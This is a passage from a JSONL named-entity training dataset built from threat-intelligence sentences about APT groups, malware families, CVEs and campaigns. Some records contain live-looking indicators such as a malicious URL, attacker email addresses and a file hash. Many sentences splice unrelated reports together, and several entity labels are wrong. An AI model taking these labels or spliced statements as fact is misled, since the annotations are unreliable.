Our first post about analyzing malware with DNS tunneling capabilities focuses on how the PoisonFrog malware uses DNS tunneling to send and receive victim information and commands . If this is a potential threat vector for the organization , dual controls need to be put in place .", "spans": {"MALWARE: XLoader": [[14, 21]], "SYSTEM: iOS": [[103, 106]], "ORGANIZATION: FireEye": [[117, 124]], "THREAT_ACTOR: admin@338 group": [[149, 164]], "TOOL: Poison Ivy": [[206, 216]], "MALWARE: PoisonFrog": [[362, 372]]}, "info": {"id": "cyberner_stix_train_002399", "source": "cyberner_stix_train"}} {"text": "The output in Figure 3 shows the Process ID ( PID ) of the csrss.exe process to be 716 .", "spans": {"TOOL: Process ID": [[33, 43]], "TOOL: PID": [[46, 49]], "FILEPATH: csrss.exe": [[59, 68]]}, "info": {"id": "cyberner_stix_train_002400", "source": "cyberner_stix_train"}} {"text": "COZY BEAR ( also referred to in some industry reports as CozyDuke or APT 29 ) is the adversary group that last year successfully infiltrated the unclassified networks of the White House , State Department , and US Joint Chiefs of Staff .", "spans": {"THREAT_ACTOR: COZY BEAR": [[0, 9]], "THREAT_ACTOR: CozyDuke": [[57, 65]], "THREAT_ACTOR: APT 29": [[69, 75]], "ORGANIZATION: White House": [[174, 185]], "ORGANIZATION: State Department": [[188, 204]], "ORGANIZATION: Joint Chiefs of Staff": [[214, 235]]}, "info": {"id": "cyberner_stix_train_002401", "source": "cyberner_stix_train"}} {"text": "The desktop components of this attack , previously discovered by Palo Alto Network , are known as KasperAgent and Micropsia . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks . However , the first compile time35 we have for WEBC2 is 2004-01-23 , suggesting that APT1 has been crafting WEBC2 backdoors since early 2004 . 
The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": {"ORGANIZATION: Palo Alto Network": [[65, 82]], "MALWARE: KasperAgent": [[98, 109]], "MALWARE: Micropsia": [[114, 123]], "ORGANIZATION: banks": [[190, 195]], "MALWARE: WEBC2": [[319, 324]], "THREAT_ACTOR: APT1": [[357, 361]], "MALWARE: WEBC2 backdoors": [[380, 395]], "MALWARE: malware": [[461, 468]], "ORGANIZATION: the game fans": [[482, 495]], "MALWARE: a malware module": [[500, 516]]}, "info": {"id": "cyberner_stix_train_002402", "source": "cyberner_stix_train"}} {"text": "Backdoor.SofacyX ( also known as X-Agent ) is a second stage piece of malware , capable of stealing information from the infected computer .", "spans": {"FILEPATH: Backdoor.SofacyX": [[0, 16]], "MALWARE: X-Agent": [[33, 40]]}, "info": {"id": "cyberner_stix_train_002403", "source": "cyberner_stix_train"}} {"text": "Although Downeks has been publicly examined to some extent , our analysis found several features not previously described .", "spans": {"MALWARE: Downeks": [[9, 16]]}, "info": {"id": "cyberner_stix_train_002404", "source": "cyberner_stix_train"}} {"text": "JUNE AND SEPTEMBER 2014 , APT28 employed “ Sedkit ” in conjunction with strategic web compromises to deliver “ Sofacy ” malware on Polish Government websites , and the websites of Polish energy company Power Exchange .", "spans": {"THREAT_ACTOR: APT28": [[26, 31]], "MALWARE: Sedkit": [[43, 49]], "MALWARE: Sofacy": [[111, 117]]}, "info": {"id": "cyberner_stix_train_002405", "source": "cyberner_stix_train"}} {"text": "The threat actors work to overcome existing security controls , or those put in place during an engagement , to complete their mission of exfiltrating intellectual property .", "spans": {}, "info": {"id": "cyberner_stix_train_002406", "source": "cyberner_stix_train"}} {"text": "Cannon acknowledges the receipt of file path by sending an email to 
sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok3 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[59, 64]], "EMAIL: sahro.bella7@post.cz": [[68, 88]], "FILEPATH: s.txt": [[94, 99]]}, "info": {"id": "cyberner_stix_train_002407", "source": "cyberner_stix_train"}} {"text": "The target is encouraged to download an archive file in a rar or zip format that contains an executable file masquerading as a Microsoft Word document .", "spans": {"TOOL: rar": [[58, 61]], "TOOL: zip": [[65, 68]], "ORGANIZATION: Microsoft": [[127, 136]], "TOOL: Word": [[137, 141]]}, "info": {"id": "cyberner_stix_train_002408", "source": "cyberner_stix_train"}} {"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL’s Kalignite multivendor ATM platform . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Ploutus": [[68, 75]], "MALWARE: Ploutus-D": [[85, 94]], "THREAT_ACTOR: Barium": [[220, 226]]}, "info": {"id": "cyberner_stix_train_002409", "source": "cyberner_stix_train"}} {"text": "This will be the trigger for the service to start the beaconing . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation . DDKONG Plugin : SHA256 : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . 
There is high turnover of staff , especially in entrylevel positions , which makes it difficult to ensure all staff have cybersecurity training .", "spans": {"THREAT_ACTOR: Seedworm": [[107, 115]], "THREAT_ACTOR: espionage group": [[124, 139]], "THREAT_ACTOR: APT28": [[140, 145]], "THREAT_ACTOR: Swallowtail": [[152, 163]], "THREAT_ACTOR: Fancy Bear": [[166, 176]], "ORGANIZATION: embassy": [[219, 226]], "MALWARE: DDKONG": [[256, 262]], "FILEPATH: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[281, 345]], "VULNERABILITY: high turnover of staff": [[357, 379]], "VULNERABILITY: difficult to ensure all staff have cybersecurity training": [[434, 491]]}, "info": {"id": "cyberner_stix_train_002410", "source": "cyberner_stix_train"}} {"text": "While it ’s possible that this is a coincidence , the rest of the evidence makes it unlikely for these two malware to target the same organizations by chance .", "spans": {"MALWARE: malware": [[107, 114]]}, "info": {"id": "cyberner_stix_train_002412", "source": "cyberner_stix_train"}} {"text": "The CrowdStrike has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . In March 2014 , the gang behind Potao started using a new infection vector .", "spans": {"ORGANIZATION: CrowdStrike": [[4, 15]], "THREAT_ACTOR: PUTTER PANDA": [[87, 99]], "MALWARE: Potao": [[184, 189]], "MALWARE: infection vector": [[210, 226]]}, "info": {"id": "cyberner_stix_train_002413", "source": "cyberner_stix_train"}} {"text": "It collects information about the smartphone ( IMEI , country , service provider , operating system language ) and sends it to the host via the HTTP POST request . Turla is a notorious group that has been targeting government officials . The IoCs are also available in our GitHub repository . 
Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": {"THREAT_ACTOR: Turla": [[164, 169]], "ORGANIZATION: government officials": [[215, 235]], "TOOL: GitHub": [[273, 279]], "THREAT_ACTOR: LockBit": [[339, 346]], "THREAT_ACTOR: Royal ransomware gang": [[370, 391]], "TOOL: new encryptor": [[406, 419]], "ORGANIZATION: Manufacturing sector": [[463, 483]]}, "info": {"id": "cyberner_stix_train_002414", "source": "cyberner_stix_train"}} {"text": "Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"MALWARE: phishing email": [[24, 38]], "ORGANIZATION: governments": [[228, 239]], "ORGANIZATION: militaries": [[244, 254]], "ORGANIZATION: defense attaches": [[257, 273]], "ORGANIZATION: media entities": [[276, 290]], "ORGANIZATION: dissidents": [[297, 307]], "ORGANIZATION: figures": [[312, 319]], "ORGANIZATION: Russian government": [[343, 361]]}, "info": {"id": "cyberner_stix_train_002415", "source": "cyberner_stix_train"}} {"text": "Giving an attacker access to a mobile device can have severe business consequences , especially if the end user is using their mobile device to discuss sensitive business topics or access enterprise financial information . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . 
This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan .", "spans": {"VULNERABILITY: Scarlet Mimic exploit": [[326, 347]], "ORGANIZATION: PwC UK": [[412, 418]], "ORGANIZATION: BAE Systems": [[423, 434]], "ORGANIZATION: managed IT service providers": [[527, 555]]}, "info": {"id": "cyberner_stix_train_002416", "source": "cyberner_stix_train"}} {"text": "In the following image , we can see how the malware receives a JSON object from the C & C server containing the command to start recording , the targeted apps and the recorded video size ratio . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" .", "spans": {"THREAT_ACTOR: threat actors": [[342, 355]], "MALWARE: ProjectSauron": [[464, 477]], "THREAT_ACTOR: Strider": [[496, 503]]}, "info": {"id": "cyberner_stix_train_002417", "source": "cyberner_stix_train"}} {"text": "We believe that this is the reason the DEFENSOR ID trojan requests the user to allow “ Modify system settings ” . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . 
The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money .", "spans": {"MALWARE: DEFENSOR ID": [[39, 50]], "MALWARE: Gelup": [[264, 269]], "THREAT_ACTOR: Lazarus Group": [[276, 289]]}, "info": {"id": "cyberner_stix_train_002418", "source": "cyberner_stix_train"}} {"text": "Similar to other malware seen in the past , Charger checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine , Russia , or Belarus . In two months , the group returned to their proven method and withdrew funds again through ATMs . During the investigation into FIN7 , our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": {"MALWARE: Charger": [[44, 51]], "THREAT_ACTOR: FIN7": [[317, 321], [413, 417]], "MALWARE: AveMaria": [[422, 430]]}, "info": {"id": "cyberner_stix_train_002419", "source": "cyberner_stix_train"}} {"text": "It encodes strings into binary arrays , making it hard to inspect them . We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 . Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies . 
Looking at the top 3 M domains , only 210 K use CSP .", "spans": {"SYSTEM: CSP": [[438, 441]]}, "info": {"id": "cyberner_stix_train_002420", "source": "cyberner_stix_train"}} {"text": "Since then , the number and diversity of components has increased drastically .", "spans": {}, "info": {"id": "cyberner_stix_train_002421", "source": "cyberner_stix_train"}} {"text": "TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1 , which is a variation of a technique known as \" parking \" .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: C2": [[37, 39]], "IP_ADDRESS: 127.0.0.1": [[94, 103]]}, "info": {"id": "cyberner_stix_train_002423", "source": "cyberner_stix_train"}} {"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . 
The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc .", "spans": {"THREAT_ACTOR: Emissary Panda": [[4, 18]], "TOOL: China Chopper": [[43, 56]], "VULNERABILITY: CVE-2019-0604": [[264, 277]], "FILEPATH: RAT": [[284, 287]]}, "info": {"id": "cyberner_stix_train_002424", "source": "cyberner_stix_train"}} {"text": "The end of January 2015 saw the start of the most high- volume Duke campaign seen thus far , with thousands of recipients being sent spear-phishing emails that contained links to compromised websites hosting CozyDuke .", "spans": {"THREAT_ACTOR: Duke": [[63, 67]], "TOOL: emails": [[148, 154]], "MALWARE: CozyDuke": [[208, 216]]}, "info": {"id": "cyberner_stix_train_002425", "source": "cyberner_stix_train"}} {"text": "Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs .", "spans": {"TOOL: macro": [[115, 120]]}, "info": {"id": "cyberner_stix_train_002426", "source": "cyberner_stix_train"}} {"text": "The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet , although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user .", "spans": {"ORGANIZATION: FBI": [[4, 7]]}, "info": {"id": "cyberner_stix_train_002427", "source": "cyberner_stix_train"}} {"text": "This command can be used not just to update the app but to install any other software on the infected device . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . 
As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer .", "spans": {"ORGANIZATION: government office": [[227, 244]], "MALWARE: Word documents": [[299, 313]], "MALWARE: public web shell": [[419, 435]], "THREAT_ACTOR: Leafminer": [[451, 460]]}, "info": {"id": "cyberner_stix_train_002428", "source": "cyberner_stix_train"}} {"text": "One of the tell-tale signs of an obfuscated malware is the absence of code that defines the classes declared in the manifest file . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets . We spotted a courier themed spam campaign on our Secure Email Gateway (SEG ) cloud . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[219, 248]], "ORGANIZATION: FireEye": [[261, 268]], "THREAT_ACTOR: Ke3chang": [[289, 297]], "TOOL: Secure Email Gateway": [[441, 461]], "TOOL: (SEG": [[462, 466]], "THREAT_ACTOR: Hack520": [[523, 530]], "SYSTEM: Virtual Private Server ( VPS ) hosting service": [[595, 641]]}, "info": {"id": "cyberner_stix_train_002429", "source": "cyberner_stix_train"}} {"text": "] it Firenze server2mi.exodus.connexxa [ . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks . URL : http://nicoledotson.icu/debby/weatherford/Ekspertyza . 
Once they successfully breached a network , MuddyWater attempted to steal credentials and move laterally .", "spans": {"ORGANIZATION: Dragos": [[43, 49]], "TOOL: ICS vendors and manufacturers": [[84, 113]], "THREAT_ACTOR: XENOTIME": [[150, 158]], "TOOL: ICS networks": [[269, 281]], "URL: http://nicoledotson.icu/debby/weatherford/Ekspertyza": [[290, 342]], "THREAT_ACTOR: MuddyWater": [[389, 399]]}, "info": {"id": "cyberner_stix_train_002430", "source": "cyberner_stix_train"}} {"text": "We believe that during the spring of 2010 , the credential and file stealing capabilities of PinchDuke were slowly ported to CosmicDuke , effectively making PinchDuke obsolete .", "spans": {"MALWARE: PinchDuke": [[93, 102], [157, 166]], "MALWARE: CosmicDuke": [[125, 135]]}, "info": {"id": "cyberner_stix_train_002431", "source": "cyberner_stix_train"}} {"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 .", "spans": {"MALWARE: PICKPOCKET": [[0, 10]], "MALWARE: Bookworm": [[144, 152]], "MALWARE: PlugX": [[200, 205]], "ORGANIZATION: Unit 42": [[289, 296]]}, "info": {"id": "cyberner_stix_train_002432", "source": "cyberner_stix_train"}} {"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . 
Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 .", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: Cloud Atlas": [[149, 160]], "ORGANIZATION: Microsoft": [[243, 252]], "VULNERABILITY: CVE-2017-11882": [[276, 290]], "VULNERABILITY: CVE-2018-0802": [[302, 315]]}, "info": {"id": "cyberner_stix_train_002433", "source": "cyberner_stix_train"}} {"text": "Yes , we are talking about SuperMarioRun , which was recently launched by Nintendo only for iOS users . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels” of defense . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools .", "spans": {"SYSTEM: SuperMarioRun": [[27, 40]], "ORGANIZATION: Nintendo": [[74, 82]], "SYSTEM: iOS": [[92, 95]], "THREAT_ACTOR: hackers": [[164, 171]], "THREAT_ACTOR: Gallmaker": [[240, 249]], "MALWARE: LotL": [[314, 318]], "MALWARE: publicly available hack tools": [[331, 360]]}, "info": {"id": "cyberner_stix_train_002434", "source": "cyberner_stix_train"}} {"text": "Although something had already been published , we decided to do something different with the data we acquired . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . 
We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"THREAT_ACTOR: Fxmsp": [[134, 139]], "ORGANIZATION: antivirus companies": [[188, 207]], "VULNERABILITY: CVE-2018-8120": [[273, 286]], "VULNERABILITY: UACME": [[290, 295]], "MALWARE: SocGholish": [[407, 417]]}, "info": {"id": "cyberner_stix_train_002435", "source": "cyberner_stix_train"}} {"text": "We believe that an industry-wide collaboration and information-sharing is important in defending customers against this complex piece of malware . In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . While we are still in the process of analyzing this backdoor’s full functionality , it seems to be similar to the Remy backdoor described in our previous whitepaper on OceanLotus malware . The group behind the Winnti malware ( which we will call the Winnti group for brevity ) sprung up as a band of traditional cyber crooks , comprising black hats whose technical skills were employed to perpetrate financial fraud .", "spans": {"TOOL: PIVY": [[202, 206]], "THREAT_ACTOR: attackers": [[209, 218]], "TOOL: RAT": [[228, 231]], "ORGANIZATION: security firm RSA": [[246, 263]], "MALWARE: Remy backdoor": [[436, 449]], "THREAT_ACTOR: OceanLotus": [[490, 500]], "MALWARE: Winnti malware": [[532, 546]], "THREAT_ACTOR: Winnti group": [[572, 584]], "THREAT_ACTOR: traditional cyber crooks": [[622, 646]], "THREAT_ACTOR: black hats whose technical skills were employed to perpetrate financial fraud": [[660, 737]]}, "info": {"id": "cyberner_stix_train_002436", "source": "cyberner_stix_train"}} {"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . 
We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples .", "spans": {"ORGANIZATION: Manufacturing": [[40, 53]], "ORGANIZATION: Information Technology": [[56, 78]], "ORGANIZATION: Agriculture": [[81, 92]], "ORGANIZATION: Logistics": [[99, 108]], "MALWARE: MoonWind": [[131, 139]]}, "info": {"id": "cyberner_stix_train_002437", "source": "cyberner_stix_train"}} {"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "MALWARE: malicious attachments": [[37, 58]], "THREAT_ACTOR: LYCEUM’s": [[122, 130]], "ORGANIZATION: executives": [[144, 154]], "ORGANIZATION: HR staff": [[157, 165]], "ORGANIZATION: IT personnel": [[172, 184]]}, "info": {"id": "cyberner_stix_train_002438", "source": "cyberner_stix_train"}} {"text": "Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": {"THREAT_ACTOR: Suckfly": [[123, 130]]}, "info": {"id": "cyberner_stix_train_002439", "source": "cyberner_stix_train"}} {"text": "As a result of a lot of hard work done by our security research teams , we revealed today a new and alarming malware campaign . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems . Rolles also provides an overview of each obfuscation technique in the same post . 
Hildegard has used an IRC channel for C2 communications.[6 ]", "spans": {"THREAT_ACTOR: APT38": [[128, 133]], "SYSTEM: IRC channel": [[452, 463]], "SYSTEM: C2 communications.[6": [[468, 488]]}, "info": {"id": "cyberner_stix_train_002440", "source": "cyberner_stix_train"}} {"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption .", "spans": {"MALWARE: BalkanDoor": [[33, 43]], "VULNERABILITY: CVE-2018-20250": [[228, 242]], "VULNERABILITY: CVE-2018-0798": [[245, 258]]}, "info": {"id": "cyberner_stix_train_002442", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT Targets NGOs .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "ORGANIZATION: NGOs": [[25, 29]]}, "info": {"id": "cyberner_stix_train_002443", "source": "cyberner_stix_train"}} {"text": "Call Command Figure 9 : The calling functionality . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . Threat Group-3390 is a Chinese threat group that extensively used strategic Web compromises to target victims .", "spans": {"VULNERABILITY: CVE-2017-0143": [[52, 65]], "MALWARE: tools—EternalRomance": [[101, 121]], "MALWARE: EternalSynergy—that": [[126, 145]], "THREAT_ACTOR: Threat Group-3390": [[211, 228]]}, "info": {"id": "cyberner_stix_train_002444", "source": "cyberner_stix_train"}} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . 
The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation .", "spans": {"TOOL: POWRUNER": [[0, 8]], "MALWARE: RTF file": [[41, 49]], "VULNERABILITY: CVE-2017-0199": [[65, 78]], "FILEPATH: Okrum": [[133, 138]]}, "info": {"id": "cyberner_stix_train_002445", "source": "cyberner_stix_train"}} {"text": "] 175 [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government . Mechanisms vary for different OS . How to locate where stack strings are decoded Every Block of stack strings ends with followed by a .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[27, 56]], "THREAT_ACTOR: APT33": [[119, 124]]}, "info": {"id": "cyberner_stix_train_002446", "source": "cyberner_stix_train"}} {"text": "Enable a secure lock screen : Pick a PIN , pattern , or password that is easy for you to remember and hard for others to guess . This means that the Leafminer group is targeting electric utilities . The embedded payload data has a specific structure , that is parsed by the added unpacking code . Rhysida ’s encryption algorithm is relatively straightforward and uses the ChaCha20 encryption algorithm .", "spans": {"THREAT_ACTOR: Leafminer group": [[149, 164]], "ORGANIZATION: electric utilities": [[178, 196]], "MALWARE: Rhysida ’s encryption algorithm": [[297, 328]]}, "info": {"id": "cyberner_stix_train_002447", "source": "cyberner_stix_train"}} {"text": "That is actually how the bad guys decided to monetize the Trojan . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . 
The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document .", "spans": {"ORGANIZATION: Kaspersky Lab": [[82, 95], [223, 236]], "VULNERABILITY: zero-day": [[161, 169]], "MALWARE: Helminth": [[289, 297]]}, "info": {"id": "cyberner_stix_train_002448", "source": "cyberner_stix_train"}} {"text": "The Trojan displays a phishing page ( bank.html ) prompting the user to enter their bank card details . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . This means that the Leafminer group is targeting electric utilities .", "spans": {"THREAT_ACTOR: Bahamut": [[177, 184]], "MALWARE: Devoted To Humanity": [[200, 219]], "THREAT_ACTOR: Leafminer group": [[339, 354]], "ORGANIZATION: electric utilities": [[368, 386]]}, "info": {"id": "cyberner_stix_train_002449", "source": "cyberner_stix_train"}} {"text": "Throughout the final quarter of 2016 and first month of 2017 , FireEye Dynamic Threat Intelligence (DTI) observed consistent Magnitude EK hits from several customers , the majority of whom reside in the APAC region . 
Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"ORGANIZATION: FireEye": [[63, 70]], "TOOL: Magnitude EK": [[125, 137]], "EMAIL: watsonhenny@gmail.com": [[255, 276]], "ORGANIZATION: employees": [[318, 327]], "THREAT_ACTOR: APT38": [[356, 361]]}, "info": {"id": "cyberner_stix_train_002450", "source": "cyberner_stix_train"}} {"text": "The path that is used for the uploads is : http : // /apps/d/p/op.php The communication looks like this : First Phase The first phase of the app ’ s attack flow collects device information and a list of apps installed on the device . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018 . That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": {"THREAT_ACTOR: APT33": [[346, 351]], "ORGANIZATION: military": [[515, 523]], "MALWARE: BlackSuit": [[739, 748]], "MALWARE: Royal ransomware": [[816, 832]]}, "info": {"id": "cyberner_stix_train_002451", "source": "cyberner_stix_train"}} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . 
Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": {"MALWARE: .rtf file": [[43, 52]], "VULNERABILITY: CVE-2017-0199": [[68, 81]], "MALWARE: unsophisticated": [[169, 184]], "MALWARE: malware": [[185, 192]], "MALWARE: malicious shortcut": [[226, 244]], "FILEPATH: .lnk": [[247, 251]], "MALWARE: HTML help ( .chm ) files": [[292, 316]], "MALWARE: Microsoft Office documents": [[322, 348]]}, "info": {"id": "cyberner_stix_train_002452", "source": "cyberner_stix_train"}} {"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": {"TOOL: NetWire": [[0, 7]], "TOOL: DarkComet": [[10, 19]], "TOOL: NanoCore": [[22, 30]], "TOOL: LuminosityLink": [[33, 47]], "TOOL: Remcos": [[50, 56]], "TOOL: Imminent Monitor": [[61, 77]], "ORGANIZATION: labor rights advocates": [[229, 251]], "ORGANIZATION: foreign policy institutions": [[273, 300]]}, "info": {"id": "cyberner_stix_train_002453", "source": "cyberner_stix_train"}} {"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message . 
The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": {"MALWARE: malicious document": [[46, 64]], "TOOL: PDF": [[147, 150]], "VULNERABILITY: exploits": [[151, 159], [181, 189], [226, 234]], "TOOL: Adobe Flash Player": [[162, 180]], "VULNERABILITY: CVE-2012-0158": [[207, 220]], "TOOL: Word": [[221, 225]], "MALWARE: Tran Duy Linh": [[281, 294]]}, "info": {"id": "cyberner_stix_train_002454", "source": "cyberner_stix_train"}} {"text": "Error Registration Ok Empty SendSMS RequestGoogleCC Wipe OpenBrowser SendUSSD RequestSMSList RequestAppList RequestLocation ShowNotification SetLockPassword LockNow MuteSound LoadScript LoadPlugin ServerChange StartApp CallPhone SetPingTimer SMSBroadcast RequestContacts AddInject RemoveInject Evaluate Another feature of this trojan is the ability to register injects , which are JavaScript snippets of code . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime .", "spans": {"THREAT_ACTOR: group": [[436, 441]], "THREAT_ACTOR: APT38": [[560, 565]], "ORGANIZATION: financial institutions": [[598, 620]]}, "info": {"id": "cyberner_stix_train_002455", "source": "cyberner_stix_train"}} {"text": "The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . 
It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: SQL injection": [[24, 37]], "THREAT_ACTOR: attackers": [[250, 259]], "MALWARE: Naikon proxies": [[267, 281]]}, "info": {"id": "cyberner_stix_train_002456", "source": "cyberner_stix_train"}} {"text": "This technique bypasses AppLocker restrictions and permits the execution of code within the SCT file .", "spans": {"TOOL: AppLocker": [[24, 33]]}, "info": {"id": "cyberner_stix_train_002457", "source": "cyberner_stix_train"}} {"text": "This tool has been used by several Chinese-affiliated threat actors , such as APT 27 and APT 40 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"THREAT_ACTOR: threat actors": [[54, 67]], "THREAT_ACTOR: APT 27": [[78, 84]], "THREAT_ACTOR: APT 40": [[89, 95]], "THREAT_ACTOR: Clever Kitten": [[98, 111]], "ORGANIZATION: individual": [[277, 287]], "ORGANIZATION: social engineering": [[321, 339]]}, "info": 